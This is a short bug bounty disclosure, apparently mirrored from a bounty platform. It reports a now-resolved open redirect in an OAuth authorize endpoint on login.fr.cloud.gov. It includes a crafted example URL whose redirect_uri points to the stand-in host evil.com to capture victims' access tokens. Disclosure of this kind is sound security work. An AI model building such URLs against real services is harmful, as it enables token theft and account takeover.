Loading HuntDB...

Stealing Users OAuth Tokens through redirect_uri parameter

High
G
GSA Bounty
Submitted None
Reported by manshum12

Vulnerability Details

Technical details and impact analysis

Open Redirect
I found that https://login.fr.cloud.gov/oauth/authorize has vulnerability by open redirect on oauth redirect_uri which can lead to users oauth tokens being leaked to any malicious user. Step : 1, Clicked on link https://login.fr.cloud.gov/oauth/authorize?client_id=███&response_type=token&redirect_uri=https%3A%2F%2Fevil.com%2Fauth%2Fcallback&state=███ 2, Choose any .gov account to login ( Screenshot ) then i believe you will got redirect to evil.com with oauth access token . ## Impact Attacker can using this bug to stolen victim access token , that means he can takeover victim account .

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$750.00

Submitted

Weakness

Open Redirect